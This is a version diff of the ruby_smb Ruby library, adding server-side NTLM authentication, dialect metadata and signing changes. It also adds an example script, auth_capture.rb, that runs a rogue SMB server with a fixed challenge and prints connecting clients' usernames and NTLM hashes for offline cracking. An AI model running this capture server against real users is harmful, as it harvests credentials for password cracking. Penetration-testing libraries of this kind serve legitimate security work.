ruby_smb 2.0.10 → 2.0.11

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: 6a940f63ee744f0a05d22023d31d1712d97f43bb267b186705df9d0f2f7c3f76
-  data.tar.gz: cdbf67cbbdda11e5c25c4773d776899664dd6aba252a65d1ebab7426b6e65d7a
+  metadata.gz: c45b986cea81d23700cf798535e234f058639645ff38416ca2caac32f4fd4958
+  data.tar.gz: 6c5efa5a6e195767262f63a3f49043e7abda4e11dc763bb83553a6507a9242fd
 SHA512:
-  metadata.gz: 550932f77f53fc427e0470db3699832bbf29c86fadd823ce8d7589813a0d7cad13dae5573bf0b8e744fdbef1d62cbab6360ee8c189ed63ee6d79f952c58361a3
-  data.tar.gz: d5bbb37e144ee6ac920c3b577f22ff11cae9848d75649177ad77d4051a241ce7f7e5df2c1114ba1e4f566eeb2283bdc95aa56be419fbba415e5662afe12221a6
+  metadata.gz: f6a54c8d0e8faf6d4ec317808ba077e01c470646e13b1b9c5b56c25f1fdc32bc101f137357112e6394c9111aae02d7bd47612f0f8f09226d1fdd9b595070a16a
+  data.tar.gz: 598e2c300856315be3d522ccce9b639f4159995b7c99595cd5cac1c167bea972f9d0cce380fa4da001bdf7c3d9515d1d23194780fd7de53355f968580d273103

data/examples/auth_capture.rb

@@ -0,0 +1,71 @@
+#!/usr/bin/ruby
+
+require 'bundler/setup'
+require 'ruby_smb'
+require 'ruby_smb/gss/provider/ntlm'
+
+# we just need *a* default encoding to handle the strings from the NTLM messages
+Encoding.default_internal = 'UTF-8' if Encoding.default_internal.nil?
+
+def bin_to_hex(s)
+  s.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join
+end
+
+# this is a custom NTLM provider that will log the challenge and responses for offline cracking action!
+class HaxorNTLMProvider < RubySMB::Gss::Provider::NTLM
+  class Authenticator < RubySMB::Gss::Provider::NTLM::Authenticator
+    # override the NTLM type 3 process method to extract all of the valuable information
+    def process_ntlm_type3(type3_msg)
+      username = "#{type3_msg.domain.encode}\\#{type3_msg.user.encode}"
+      _, client = ::Socket::unpack_sockaddr_in(@server_client.getpeername)
+
+      hash_type = nil
+      hash = "#{type3_msg.user.encode}::#{type3_msg.domain.encode}"
+
+      case type3_msg.ntlm_version
+      when :ntlmv1
+        hash_type = 'NTLMv1-SSP'
+        hash << ":#{bin_to_hex(type3_msg.lm_response)}"
+        hash << ":#{bin_to_hex(type3_msg.ntlm_response)}"
+        hash << ":#{bin_to_hex(@server_challenge)}"
+      when :ntlmv2
+        hash_type = 'NTLMv2-SSP'
+        hash << ":#{bin_to_hex(@server_challenge)}"
+        # NTLMv2 responses consist of the proof string whose calculation also includes the additional response fields
+        hash << ":#{bin_to_hex(type3_msg.ntlm_response[0...16])}"  # proof string
+        hash << ":#{bin_to_hex(type3_msg.ntlm_response[16.. -1])}" # additional response fields
+      end
+
+      unless hash_type.nil?
+        version = @server_client.metadialect.version_name
+        puts "[#{version}] #{hash_type} Client   : #{client}"
+        puts "[#{version}] #{hash_type} Username : #{username}"
+        puts "[#{version}] #{hash_type} Hash     : #{hash}"
+      end
+
+      WindowsError::NTStatus::STATUS_ACCESS_DENIED
+    end
+  end
+
+  def new_authenticator(server_client)
+    # build and return an instance that can process and track stateful information for a particular connection but
+    # that's backed by this particular provider
+    Authenticator.new(self, server_client)
+  end
+
+  # we're overriding the default challenge generation routine here as opposed to leaving it random (the default)
+  def generate_server_challenge(&block)
+    "\x11\x22\x33\x44\x55\x66\x77\x88"
+  end
+end
+
+# define a new server with the custom authentication provider
+server = RubySMB::Server.new(
+  gss_provider: HaxorNTLMProvider.new
+)
+puts "server is running"
+server.run do
+  puts "received connection"
+  # accept all of the connections and run forever
+  true
+end

data/lib/ruby_smb/client/negotiation.rb

@@ -121,7 +121,7 @@ module RubySMB
           'SMB1'
         when RubySMB::SMB2::Packet::NegotiateResponse
           self.smb1 = false
-          unless packet.dialect_revision.to_i == 0x02ff
+          unless packet.dialect_revision.to_i == RubySMB::SMB2::SMB2_WILDCARD_REVISION
             self.smb2 = packet.dialect_revision.to_i >= 0x0200 && packet.dialect_revision.to_i < 0x0300
             self.smb3 = packet.dialect_revision.to_i >= 0x0300 && packet.dialect_revision.to_i < 0x0400
           end

data/lib/ruby_smb/client.rb

@@ -2,18 +2,19 @@ module RubySMB
   # Represents an SMB client capable of talking to SMB1 or SMB2 servers and handling
   # all end-user client functionality.
   class Client
+    require 'ruby_smb/ntlm'
+    require 'ruby_smb/signing'
     require 'ruby_smb/client/negotiation'
     require 'ruby_smb/client/authentication'
-    require 'ruby_smb/client/signing'
     require 'ruby_smb/client/tree_connect'
     require 'ruby_smb/client/echo'
     require 'ruby_smb/client/utils'
     require 'ruby_smb/client/winreg'
     require 'ruby_smb/client/encryption'
 
+    include RubySMB::Signing
     include RubySMB::Client::Negotiation
     include RubySMB::Client::Authentication
-    include RubySMB::Client::Signing
     include RubySMB::Client::TreeConnect
     include RubySMB::Client::Echo
     include RubySMB::Client::Utils
@@ -436,14 +437,14 @@ module RubySMB
       when 'SMB1'
         packet.smb_header.uid = self.user_id if self.user_id
         packet.smb_header.pid_low = self.pid if self.pid
-        packet = smb1_sign(packet)
+        packet = smb1_sign(packet) if signing_required && !session_key.empty?
       when 'SMB2'
         packet = increment_smb_message_id(packet)
         packet.smb2_header.session_id = session_id
-        unless packet.is_a?(RubySMB::SMB2::Packet::SessionSetupRequest)
-          if self.smb2
+        unless packet.is_a?(RubySMB::SMB2::Packet::SessionSetupRequest) || session_key.empty?
+          if self.smb2 && signing_required
             packet = smb2_sign(packet)
-          elsif self.smb3
+          elsif self.smb3 && (signing_required || packet.is_a?(RubySMB::SMB2::Packet::TreeConnectRequest))
             packet = smb3_sign(packet)
           end
         end
@@ -652,9 +653,9 @@ module RubySMB
     def default_flags
       negotiate_version_flag = 0x02000000
       flags = Net::NTLM::Client::DEFAULT_FLAGS |
-        Net::NTLM::FLAGS[:TARGET_INFO] |
+        RubySMB::NTLM::NEGOTIATE_FLAGS[:TARGET_INFO] |
         negotiate_version_flag ^
-        Net::NTLM::FLAGS[:OEM]
+        RubySMB::NTLM::NEGOTIATE_FLAGS[:OEM]
 
       flags
     end

data/lib/ruby_smb/dialect.rb

@@ -0,0 +1,45 @@
+module RubySMB
+  # Definitions that define metadata around a particular SMB dialect. This is useful for grouping dialects into a
+  # hierarchy as well as printing them as human readable strings with varying degrees of specificity.
+  module Dialect
+    # the order (taxonomic ranking) of the family, 2 and 3 are intentionally combined
+    ORDER_SMB1 = 'SMB1'.freeze
+    ORDER_SMB2 = 'SMB2'.freeze
+
+    # the family of the dialect
+    FAMILY_SMB1 = 'SMB 1'.freeze
+    FAMILY_SMB2 = 'SMB 2.x'.freeze
+    FAMILY_SMB3 = 'SMB 3.x'.freeze
+
+    # the major version of the dialect
+    VERSION_SMB1 = 'SMB v1'.freeze
+    VERSION_SMB2 = 'SMB v2'.freeze
+    VERSION_SMB3 = 'SMB v3'.freeze
+
+    # the names are meant to be human readable and may change in the future, use the #dialect, #order and #family
+    # attributes for any programmatic comparisons
+    Definition = Struct.new(:dialect, :order, :family, :version_name, :full_name) do
+      alias_method :short_name, :version_name
+    end
+
+    ALL = [
+      Definition.new('NT LM 0.12', ORDER_SMB1, FAMILY_SMB1, VERSION_SMB1, 'SMB v1 (NT LM 0.12)'.freeze),
+      Definition.new('0x0202',     ORDER_SMB2, FAMILY_SMB2, VERSION_SMB2, 'SMB v2.0.2'.freeze),
+      Definition.new('0x0210',     ORDER_SMB2, FAMILY_SMB2, VERSION_SMB2, 'SMB v2.1'.freeze),
+      Definition.new('0x02ff',     ORDER_SMB2, FAMILY_SMB2, VERSION_SMB2, 'SMB 2.???'.freeze), # wildcard revision
+      Definition.new('0x0300',     ORDER_SMB2, FAMILY_SMB3, VERSION_SMB3, 'SMB v3.0'.freeze),
+      Definition.new('0x0302',     ORDER_SMB2, FAMILY_SMB3, VERSION_SMB3, 'SMB v3.0.2'.freeze),
+      Definition.new('0x0311',     ORDER_SMB2, FAMILY_SMB3, VERSION_SMB3, 'SMB v3.1.1'.freeze)
+    ].map { |definition| [definition.dialect, definition] }.to_h
+
+    #
+    # Retrieve a dialect definition. The definition contains metadata describing the particular dialect.
+    #
+    # @param [Integer, String] dialect the dialect to retrieve the definition for
+    # @return [Definition, nil] the definition if it was found
+    def self.[](dialect)
+      dialect = '0x%04x' % dialect if dialect.is_a? Integer
+      ALL[dialect]
+    end
+  end
+end

data/lib/ruby_smb/dispatcher/base.rb

@@ -9,7 +9,7 @@ module RubySMB
       def nbss(packet)
         nbss = RubySMB::Nbss::SessionHeader.new
         nbss.session_packet_type = RubySMB::Nbss::SESSION_MESSAGE
-        nbss.stream_protocol_length = packet.do_num_bytes
+        nbss.stream_protocol_length = packet.do_num_bytes.to_i
         nbss.to_binary_s
       end
 

data/lib/ruby_smb/gss/provider/authenticator.rb

@@ -0,0 +1,42 @@
+module RubySMB
+  module Gss
+    module Provider
+      module Authenticator
+        #
+        # The base class for a GSS provider's unique authenticator. This provides a common interface and is not usable
+        # on it's own. The provider-specific authentication logic is defined within this authenticator class which
+        # actually runs the authentication routine.
+        #
+        class Base
+          # @param [Provider::Base] provider the GSS provider that this instance is an authenticator for
+          # @param server_client the client instance that this will be an authenticator for
+          def initialize(provider, server_client)
+            @provider = provider
+            @server_client = server_client
+            @session_key = nil
+            reset!
+          end
+
+          #
+          # Process a GSS authentication buffer. If no buffer is specified, the request is assumed to be the first in
+          # the negotiation sequence.
+          #
+          # @param [String, nil] buffer the request GSS request buffer that should be processed
+          # @return [Gss::Provider::Result] the result of the processed GSS request
+          def process(request_buffer=nil)
+            raise NotImplementedError
+          end
+
+          #
+          # Reset the authenticator's state, wiping anything related to a partial or complete authentication process.
+          #
+          def reset!
+            @session_key = nil
+          end
+
+          attr_accessor :session_key
+        end
+      end
+    end
+  end
+end

data/lib/ruby_smb/gss/provider/ntlm.rb

@@ -0,0 +1,303 @@
+require 'ruby_smb/ntlm'
+
+module RubySMB
+  module Gss
+    module Provider
+      #
+      # A GSS provider that authenticates clients via the NT LAN Manager (NTLM) Security Support Provider (NTLMSSP)
+      # protocol.
+      #
+      class NTLM < Base
+        include RubySMB::NTLM
+
+        # An account representing an identity for which this provider will accept authentication attempts.
+        Account = Struct.new(:username, :password, :domain) do
+          def to_s
+            "#{domain}\\#{username}"
+          end
+        end
+
+        class Authenticator < Authenticator::Base
+          def reset!
+            super
+            @server_challenge = nil
+          end
+
+          def process(request_buffer=nil)
+            if request_buffer.nil?
+              # this is only NTLMSSP (as opposed to SPNEGO + NTLMSSP)
+              buffer = OpenSSL::ASN1::ASN1Data.new([
+                Gss::OID_SPNEGO,
+                OpenSSL::ASN1::ASN1Data.new([
+                  OpenSSL::ASN1::Sequence.new([
+                    OpenSSL::ASN1::ASN1Data.new([
+                      OpenSSL::ASN1::Sequence.new([
+                        Gss::OID_NTLMSSP
+                      ])
+                    ], 0, :CONTEXT_SPECIFIC),
+                    OpenSSL::ASN1::ASN1Data.new([
+                      OpenSSL::ASN1::ASN1Data.new([
+                        OpenSSL::ASN1::ASN1Data.new([
+                          OpenSSL::ASN1::GeneralString.new('not_defined_in_RFC4178@please_ignore')
+                        ], 0, :CONTEXT_SPECIFIC)
+                      ], 16, :UNIVERSAL)
+                    ], 3, :CONTEXT_SPECIFIC)
+                  ])
+                ], 0, :CONTEXT_SPECIFIC)
+              ], 0, :APPLICATION).to_der
+              return Result.new(buffer, WindowsError::NTStatus::STATUS_SUCCESS)
+            end
+
+            begin
+              gss_api = OpenSSL::ASN1.decode(request_buffer)
+            rescue OpenSSL::ASN1::ASN1Error
+              return
+            end
+
+            if gss_api&.tag == 0 && gss_api&.tag_class == :APPLICATION
+              result = process_gss_type1(gss_api)
+            elsif gss_api&.tag == 1 && gss_api&.tag_class == :CONTEXT_SPECIFIC
+              result = process_gss_type3(gss_api)
+            end
+
+            result
+          end
+
+          #
+          # Process the NTLM type 1 message and build a type 2 response message.
+          #
+          # @param [Net::NTLM::Message::Type1] type1_msg the NTLM type 1 message received by the client that should be
+          #   processed
+          # @return [Net::NTLM::Message::Type2] the NTLM type 2 response message with which to reply to the client
+          def process_ntlm_type1(type1_msg)
+            type2_msg = Net::NTLM::Message::Type2.new.tap do |msg|
+              msg.target_name = 'LOCALHOST'.encode('UTF-16LE').b
+              msg.flag = 0
+              %i{ KEY56 KEY128 KEY_EXCHANGE UNICODE TARGET_INFO VERSION_INFO }.each do |flag|
+                msg.flag |= NTLM::NEGOTIATE_FLAGS.fetch(flag)
+              end
+
+              @server_challenge = @provider.generate_server_challenge
+              msg.challenge = @server_challenge.unpack1('Q<') # 64-bit unsigned, little endian (uint64_t)
+              target_info = Net::NTLM::TargetInfo.new('')
+              target_info.av_pairs.merge!({
+                Net::NTLM::TargetInfo::MSV_AV_NB_DOMAIN_NAME => @provider.netbios_domain.encode('UTF-16LE').b,
+                Net::NTLM::TargetInfo::MSV_AV_NB_COMPUTER_NAME => @provider.netbios_hostname.encode('UTF-16LE').b,
+                Net::NTLM::TargetInfo::MSV_AV_DNS_DOMAIN_NAME => @provider.dns_domain.encode('UTF-16LE').b,
+                Net::NTLM::TargetInfo::MSV_AV_DNS_COMPUTER_NAME => @provider.dns_hostname.encode('UTF-16LE').b,
+                Net::NTLM::TargetInfo::MSV_AV_TIMESTAMP => [(Time.now.to_i + Net::NTLM::TIME_OFFSET) * Field::FileTime::NS_MULTIPLIER].pack('Q')
+              })
+              msg.target_info = target_info.to_s
+              msg.enable(:target_info)
+              msg.context = 0
+              msg.enable(:context)
+              msg.os_version = NTLM::OSVersion.new(major: 6, minor: 3).to_binary_s
+              msg.enable(:os_version)
+            end
+
+            type2_msg
+          end
+
+          #
+          # Process the NTLM type 3 message and either accept or reject the authentication attempt.
+          #
+          # @param [Net::NTLM::Message::Type3] type3_msg the NTLM type 3 message received by the client that should be
+          #   processed
+          # @return [WindowsError::ErrorCode] an NT Status error code representing the operations outcome where
+          #   STATUS_SUCCESS is a successful authentication attempt and anything else is a failure
+          def process_ntlm_type3(type3_msg)
+            if type3_msg.user == '' && type3_msg.domain == ''
+              if @provider.allow_anonymous
+                return WindowsError::NTStatus::STATUS_SUCCESS
+              end
+
+              return WindowsError::NTStatus::STATUS_LOGON_FAILURE
+            end
+
+            account = @provider.get_account(
+              type3_msg.user,
+              domain: type3_msg.domain
+            )
+            return WindowsError::NTStatus::STATUS_LOGON_FAILURE if account.nil?
+
+            matches = false
+            case type3_msg.ntlm_version
+            when :ntlmv1
+              my_ntlm_response = Net::NTLM::ntlm_response(
+                ntlm_hash: Net::NTLM::ntlm_hash(account.password.encode('UTF-16LE'), unicode: true),
+                challenge: @server_challenge
+              )
+              matches = my_ntlm_response == type3_msg.ntlm_response
+            when :ntlmv2
+              digest = OpenSSL::Digest::MD5.new
+              their_nt_proof_str = type3_msg.ntlm_response[0...digest.digest_length]
+              their_blob = type3_msg.ntlm_response[digest.digest_length..-1]
+
+              ntlmv2_hash = Net::NTLM.ntlmv2_hash(
+                account.username.encode('UTF-16LE'),
+                account.password.encode('UTF-16LE'),
+                type3_msg.domain.encode('UTF-16LE'),  # don't use the account domain because of the special '.' value
+                {client_challenge: their_blob[16...24], unicode: true}
+              )
+
+              my_nt_proof_str = OpenSSL::HMAC.digest(OpenSSL::Digest::MD5.new, ntlmv2_hash, @server_challenge + their_blob)
+              matches = my_nt_proof_str == their_nt_proof_str
+              if matches
+                user_session_key = OpenSSL::HMAC.digest(OpenSSL::Digest::MD5.new, ntlmv2_hash, my_nt_proof_str)
+                if type3_msg.flag & NTLM::NEGOTIATE_FLAGS[:KEY_EXCHANGE] == NTLM::NEGOTIATE_FLAGS[:KEY_EXCHANGE] && type3_msg.session_key.length == 16
+                  rc4 = OpenSSL::Cipher.new('rc4')
+                  rc4.decrypt
+                  rc4.key = user_session_key
+                  @session_key = rc4.update type3_msg.session_key
+                  @session_key << rc4.final
+                else
+                  @session_key = user_session_key
+                end
+              end
+            else
+              # the only other value Net::NTLM will return for this is ntlm_session
+              raise NotImplementedError, "authentication via ntlm version #{type3_msg.ntlm_version} is not supported"
+            end
+
+            return WindowsError::NTStatus::STATUS_LOGON_FAILURE unless matches
+
+            WindowsError::NTStatus::STATUS_SUCCESS
+          end
+
+          attr_accessor :server_challenge
+
+          private
+
+          # take the GSS blob, extract the NTLM type 1 message and pass it to the process method to build the response
+          # which is then put back into a new GSS reply-blob
+          def process_gss_type1(gss_api)
+            unless Gss.asn1dig(gss_api, 1, 0, 0, 0, 0)&.value == Gss::OID_NTLMSSP.value
+              return
+            end
+
+            raw_type1_msg = Gss.asn1dig(gss_api, 1, 0, 1, 0)&.value
+            return unless raw_type1_msg
+
+            type1_msg = Net::NTLM::Message.parse(raw_type1_msg)
+            if type1_msg.flag & NTLM::NEGOTIATE_FLAGS[:UNICODE] == NTLM::NEGOTIATE_FLAGS[:UNICODE]
+              type1_msg.domain.force_encoding('UTF-16LE')
+              type1_msg.workstation.force_encoding('UTF-16LE')
+            end
+            type2_msg = process_ntlm_type1(type1_msg)
+
+            Result.new(Gss.gss_type2(type2_msg.serialize), WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED)
+          end
+
+          # take the GSS blob, extract the NTLM type 3 message and pass it to the process method to build the response
+          # which is then put back into a new GSS reply-blob
+          def process_gss_type3(gss_api)
+            neg_token_init = Hash[RubySMB::Gss.asn1dig(gss_api, 0).value.map { |obj| [obj.tag, obj.value[0].value] }]
+            raw_type3_msg = neg_token_init[2]
+
+            type3_msg = Net::NTLM::Message.parse(raw_type3_msg)
+            if type3_msg.flag & NTLM::NEGOTIATE_FLAGS[:UNICODE] == NTLM::NEGOTIATE_FLAGS[:UNICODE]
+              type3_msg.domain.force_encoding('UTF-16LE')
+              type3_msg.user.force_encoding('UTF-16LE')
+              type3_msg.workstation.force_encoding('UTF-16LE')
+            end
+
+            nt_status = process_ntlm_type3(type3_msg)
+            buffer = identity = nil
+
+            case nt_status
+            when WindowsError::NTStatus::STATUS_SUCCESS
+              buffer = OpenSSL::ASN1::ASN1Data.new([
+                OpenSSL::ASN1::Sequence.new([
+                  OpenSSL::ASN1::ASN1Data.new([
+                    OpenSSL::ASN1::Enumerated.new(OpenSSL::BN.new(0)),
+                  ], 0, :CONTEXT_SPECIFIC)
+                ])
+              ], 1, :CONTEXT_SPECIFIC).to_der
+
+              account = @provider.get_account(
+                type3_msg.user,
+                domain: type3_msg.domain
+              )
+              if account.nil?
+                if @provider.allow_anonymous
+                  identity = IDENTITY_ANONYMOUS
+                end
+              else
+                identity = account.to_s
+              end
+            end
+
+            Result.new(buffer, nt_status, identity)
+          end
+        end
+
+        # @param [Boolean] allow_anonymous whether or not to allow anonymous authentication attempts
+        # @param [String] default_domain the default domain to use for authentication, unless specified 'WORKGROUP' will
+        #   be used
+        def initialize(allow_anonymous: false, default_domain: 'WORKGROUP')
+          raise ArgumentError, 'Must specify a default domain' unless default_domain
+
+          @allow_anonymous = allow_anonymous
+          @default_domain = default_domain
+          @accounts = []
+          @generate_server_challenge = -> { SecureRandom.bytes(8) }
+
+          @dns_domain = @netbios_domain = 'LOCALDOMAIN'
+          @dns_hostname = @netbios_hostname = 'LOCALHOST'
+        end
+
+        #
+        # Generate the 8-byte server challenge. If a block is specified, it's used as the challenge generation routine
+        # and should return an 8-byte value.
+        #
+        # @return [String] an 8-byte challenge value
+        def generate_server_challenge(&block)
+          if block.nil?
+            @generate_server_challenge.call
+          else
+            @generate_server_challenge = block
+          end
+        end
+
+        def new_authenticator(server_client)
+          # build and return an instance that can process and track stateful information for a particular connection but
+          # that's backed by this particular provider
+          Authenticator.new(self, server_client)
+        end
+
+        #
+        # Lookup and return an account based on the username and optionally, the domain. If no domain is specified or
+        # or it is the special value '.', the default domain will be used. The username and domain values are case
+        # insensitive.
+        #
+        # @param [String] username the username of the account to fetch.
+        # @param [String, nil] domain the domain in which the account to fetch exists.
+        # @return [Account, nil] the account if it was found
+        def get_account(username, domain: nil)
+          # the username and password values should use the native encoding for the comparison in the #find operation
+          username = username.downcase
+          domain = @default_domain if domain.nil? || domain == '.'.encode(domain.encoding)
+          domain = domain.downcase
+          @accounts.find { |account| account.username.encode(username.encoding).downcase == username && account.domain.encode(domain.encoding).downcase == domain }
+        end
+
+        #
+        # Add an account to the database.
+        #
+        # @param [String] username the username of the account to add
+        # @param [String] password either the plaintext password or the NTLM hash of the account to add
+        # @param [String] domain the domain of the account to add, if not specified, the @default_domain will be used
+        def put_account(username, password, domain: nil)
+          domain = @default_domain if domain.nil? || domain == '.'.encode(domain.encoding)
+          @accounts << Account.new(username, password, domain)
+        end
+
+        #
+        # The default domain value to use for accounts which do not have one specified or use the special '.' value.
+        attr_reader :default_domain
+
+        attr_accessor :dns_domain, :dns_hostname, :netbios_domain, :netbios_hostname
+      end
+    end
+  end
+end